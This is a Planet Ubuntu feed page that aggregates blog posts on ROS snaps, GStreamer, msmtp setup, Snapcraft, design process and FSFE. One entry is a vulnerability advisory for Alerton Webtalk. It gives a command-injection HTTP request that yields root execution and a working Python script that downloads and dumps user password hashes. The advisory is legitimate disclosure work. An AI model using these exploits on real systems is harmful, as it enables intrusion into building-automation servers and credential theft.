Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5] from Planet Ubuntu

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.
Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:
Step 1: Start with an existing gadget
Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.
Step 2: Select a name for your gadget snap
Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:
$ snapcraft register my-gadget-snap-name
If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.
Step 3: Add the required udev rule
If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:
$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
It’s outside the scope of this series to explain udev in depth, but the two values I’ve made bold are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:
# Custom serial-port interface for the Turtlebot 2
slots:
kobuki:
interface: serial-port
path: /dev/serial-port-kobuki
usb-vendor: 0x0403
usb-product: 0x6001
The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.
Step 4: Build the gadget snap
This step is easy. Just get into the gadget snap directory and run:
$ snapcraft
In the end, you’ll have a gadget snap.
Step 5: Put the gadget snap in the store
You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

Without putting it in the store you have no way of updating it in the future
Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):
$ snapcraft push /path/to/my/gadget.snap --release=stable
You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.
Step 6: Adjust our ROS snap to run under strict confinement
As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:
name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

parts:
prototype-workspace:
plugin: catkin
rosdistro: kinetic
catkin-packages: [prototype]

plugs:
kobuki:
interface: serial-port

apps:
system:
command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
plugs: [network, network-bind, kobuki]
daemon: simple
Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post. I’ve made the relevant sections bold; let’s cover them individually.
version: 0.2
We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).
# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict
You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.
plugs:
kobuki:
interface: serial-port
This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.
apps:
system:
command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
plugs: [network, network-bind, kobuki]
daemon: simple
Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.
Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).
In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.

2 days ago

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast from Planet Ubuntu

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.
In this week’s show:

We discuss what we’ve been upto recently:

Martin was interviewed on Destination Linux and also went fossil hunting on the Jurassic Coast.
Alan has been blogging using Nikola.

We discuss What’s going on at System76.

We share a Virtual Private Lurve:

Private Internet Access

And we go over all your amazing feedback – thanks for sending it – please keep sending it!

This weeks cover image is taken from Wikimedia.

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Join us in the Ubuntu Podcast Chatter group on Telegram

2 days ago

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE) from Planet Ubuntu

Introduction

Vulnerabilities were identified in the Alerton Webtalk Software supplied by
Alerton. This software is used for the management of building automation
systems. These were discovered during a black box assessment and therefore
the
vulnerability list should not be considered exhaustive. Alerton has
responded
that Webtalk is EOL and past the end of its support period. Customers
should
move to newer products available from Alerton. Thanks to Alerton for prompt
replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the
advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are
accessible via a file in the document root of the ‘webtalk’ user. The
location
of this file is configuration dependent, however the configuration file is
accessible as well (at a static location, /~webtalk/webtalk.ini). The
password
database is a sqlite3 database whose name is based on the bacnet rep and job
entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the
webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

Any user granted the “configure webtalk” permission can execute commands as
the
root user on the underlying server. There appears to be some effort of
filtering command strings (such as rejecting commands containing pipes and
redirection operators) but this is inadequate. Using this vulnerability, an
attacker can add an SSH key to the root user’s authorized_keys file.

1
2
3
4
5
6
7
8
9
10
11
12GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1

1
2
3
4
5
6
7
8
9
10
11
12HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...

Recommendation: User input should be avoided to shell commands. If this is
not
possible, shell commands should be properly escaped. Consider using one of
the
functions from the subprocess module without the shell=True parameter.

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against
Cross-Site Request Forgery. This allows an attacker to execute
administrative
changes without access to valid credentials. Combined with the above
vulnerability, this allows an attacker to gain root access without any
credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are hashed by concatenating
the
password with the username (e.g., PASSUSER) and performing a plain MD5
hash. No
salts or iterative hashing is performed. This does not follow password
hashing
best practices and makes for highly practical offline attacks.

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of
password hashes from Webtalk-01. While this only works on the mobile login
interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting
session
is able to access all resources and is functionally equivalent to a login
through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect
secrets
in transit.

Timeline

2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security () honeywell com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure

Discovery

These issues were discovered by David Tomaschik of the Google ISA
Assessments
team.

Appendix A: Script to Extract Hashes

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os

def get_webtalk_ini(base_url):
"""Get the webtalk.ini file and parse it."""
url = '%s/~webtalk/webtalk.ini' % base_url
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get webtalk.ini: %s', url)
buf = StringIO.StringIO(r.text)
parser = ConfigParser.RawConfigParser()
parser.readfp(buf)
return parser

def get_db_path(base_url, config):
rep = config.get('bacnet', 'rep')
job = config.get('bacnet', 'job')
url = '%s/~webtalk/bts/%s/%s/userprofile.db'
return url % (base_url, rep, job)

def load_db(url):
"""Load and read the db."""
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get %s.' % url)
tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
tmpf = os.fdopen(tmpfd, 'w')
tmpf.write(r.content)
tmpf.close()
con = sqlite3.connect(tmpname)
cur = con.cursor()
cur.execute("SELECT UserID, UserPassword FROM tblPassword")
results = cur.fetchall()
con.close()
os.unlink(tmpname)
return results

def users_for_server(base_url):
if '://' not in base_url:
base_url = 'http://%s' % base_url
ini = get_webtalk_ini(base_url)
db_path = get_db_path(base_url, ini)
return load_db(db_path)

if __name__ == '__main__':
for host in sys.argv[1:]:
try:
users = users_for_server(host)
except Exception as ex:
sys.stderr.write('%s\n' % str(ex))
continue
for u in users:
print '%s:%s' % (u[0], u[1])

2 days ago

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110 from Planet Ubuntu

It’s that time of year again where the broadcast industry gathers at NAB show, which seems like a good time to me to revisit some frequently asked questions about GStreamer‘s support for various broadcasting related standards
Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.
While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.
Other standards, like MXF for storage of media (which is supported by GStreamer since years), are also important in the broadcasting world, but let’s ignore these other use-cases here for now and focus on streaming live media.
Media Transport
All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization and are either fully (as in the case of AES67/Ravenna) supported by GStreamer already or at least to a big part, with the missing parts being just some extensions to existing code.
There’s not really much to say here about the actual media transport as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live-video streaming as required by security cameras for example.
Over the last months and years, many new features have been added to GStreamer’s RTP stack for various use-cases and the code was further optimized, and thanks to all that the amount of work needed for new standards based on RTP, like the beforementioned ones, is rather limited. For AES67 no additional work was needed to support it, for example.
The biggest open issue for the broadcasting-related standards currently is the need of further optimizations for high-resolution, high-framerate streaming of video. In these cases we currently run into performance problems due to the high amount of packets per second, and some serious optimizations would be needed. However there are already various ideas how to improve this situation that are just waiting to be implemented.
Synchronization
I previously already wrote about PTP in GStreamer, which is supported in GStreamer for synchronizing media and that support is now merged and has been included since the 1.8 release. In addition to that NTP is also supported now since 1.8.
In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.
Clock Signalling
One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before is a way to signal what this specific clock exactly is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which commonly is used to describe how to set up an RTP session.
The support for that feature was merged for the 1.10 release and is readily available.
Help needed? Found bugs or missing features?
While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the before mentioned standards or even, in some cases, required parts of the standard. In addition to that some optimizations may still be required, depending on your use-case.
If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.
GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

3 days ago

Harald Sitter: KDE neon CMake Package Validation from Planet Ubuntu

In KDE neon‘s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.
The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.
As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.
cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (bad syntax, missing includes, what have you…) and that our package is sound and including all dependencies it needs (to for example meet find_dependency macro calls).
As it turns out libkproperty3-dev is of insufficient quality. What a shame.

3 days ago

Joe Barker: Configuring msmtp on Ubuntu 16.04 from Planet Ubuntu

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.
I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.
To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:
# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_USERNAME>
password <PASSWORD>
from <FROM_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (i.e. <PASSWORD>) are things that need replacing specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.
Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.
sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.
/var/log/msmtp/*.log {
rotate 12
monthly
compress
missingok
notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from
sendmail_path =
to
sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following
mail ('personal@email.com', 'Test Subject', 'Test body text');
exit();

Any errors that occur at this point will be displayed in the output so should make diagnosing any errors after the test relatively easy. If all is successful, you should now be able to use PHPs sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).
I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

3 days ago

Alan Pope: April Snapcraft Docs Day from Planet Ubuntu

Continuing Snapcraft Docs Days
In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums
Flavour of the month
This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and despite our best efforts, may not have caught certain edge cases only apparent on flavours.
If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?
Soup of the day
On Friday we'd love to hear about your experiences on an Ubuntu flavour of doing things like:-

Ensuring snapd is installed via these instructions
Installing snapcraft via snap install snapcraft --edge --classic
Follow the Snapcraft Tour
Go through the first Snapcraft Tutorial
Snap a project of your own, by following our build snaps docs
Find other projects to snap (see below)

Happy Hour
On the subject of snapping other people's projects. Here's some tips we think you may find useful.

Look for new / interesting open source projects on github trending projects such as trending python projects or trending go projects, or perhaps recent show HN submissions.
Ask in #snapcraft on Rocket Chat if others have already started on a snap, to avoid duplication & collaborate.
Avoid snapping frameworks, libraries, but focus more atomic tools, utilities and full applications
Start small. Perhaps choose command line or server-based applications, as they're often easier for the beginner than full fat graphical desktop applications.
Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging
Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project, so they can incorporate it in their release process
Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.
Food for thought
Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

Project
Source
Issue Tracker

Snapd
Snapd on GitHub
Snapd bugs on Launchpad

Snapcraft
Snapcraft on GitHub
Snapcraft bugs on Launchpad

Snapcraft Docs
Snappy-docs on GitHub
Snappy-docs issues on GitHub

Tutorials
Tutorials on GitHub
Tutorials issues on GitHub

3 days ago

Canonical Design Team: Designing in the open from Planet Ubuntu

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.
One of the main things we wanted to improve was the design sign off process whilst increasing visibility for developers of which design was the final one among numerous iterations and inconsistent labelling of files and folders.
Here is the process we developed and have been using on multiple projects.
The process
Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Code block styling from https://github.com/ubuntudesign/vanilla-design/issues/12

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.
Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.
The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.
As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

Table with actions design from MAAS project

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.
Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design completes the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.
Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.
That’s it!
Benefits
If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.
Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.
If your project is open source, this process makes your designs available to your community or anyone that is interested in the product automatically. This means that anyone who wants to contribute to the project has access to all the information and assets as the team members.
The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.
Canonical is largely a company of remote workers and sometimes conversations are not documented, this means some people will be aware of the decisions and conversations. This design process has helped with the issue, as designs and discussions are all in a single place, with nicely laid out emails for all changes that anyone may be interested.
Conclusion
This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.

4 days ago

Daniel Pocock: FSFE Fellowship Representative, OSCAL'17 and other upcoming events from Planet Ubuntu

The Free Software Foundation of Europe has just completed the process of electing a new fellowship representative to the General Assembly (GA) and I was surprised to find that out of seven very deserving candidates, members of the fellowship have selected me to represent them on the GA.
I'd like to thank all those who voted, the other candidates and Erik Albers for his efforts to administer this annual process.
Please consider becoming an FSFE fellow or donor
The FSFE runs on the support of both volunteers and financial donors, including organizations and individual members of the fellowship program. The fellowship program is not about money alone, it is an opportunity to become more aware of and involved in the debate about technology's impact on society, for better or worse. Developers, users and any other supporters of the organization's mission are welcome to join, here is the form. You don't need to be a fellow or pay any money to be an active part of the free software community and FSFE events generally don't exclude non-members, nonetheless, becoming a fellow gives you a stronger voice in processes such as this annual election.
Attending OSCAL'17, Tirana
During the election period, I promised to keep on doing the things I already do: volunteering, public speaking, mentoring, blogging and developing innovative new code. During May I hope to attend several events, including OSCAL'17 in Tirana, Albania on 13-14 May. I'll be running a workshop there on the Debian Hams blend and Software Defined Radio. Please come along and encourage other people you know in the region to consider attending.

What is your view on the Fellowship and FSFE structure?
Several candidates made comments about the Fellowship program and the way individual members and volunteers are involved in FSFE governance. This is not a new topic. Debate about this topic is very welcome and I would be particularly interested to hear any concerns or ideas for improvement that people may contribute. One of the best places to share these ideas would be through the FSFE's discussion list.
In any case, the fellowship representative can not single-handedly overhaul the organization. I hope to be a constructive part of the team and that whenever my term comes to an end, the organization and the free software community in general will be stronger and happier in some way.

4 days ago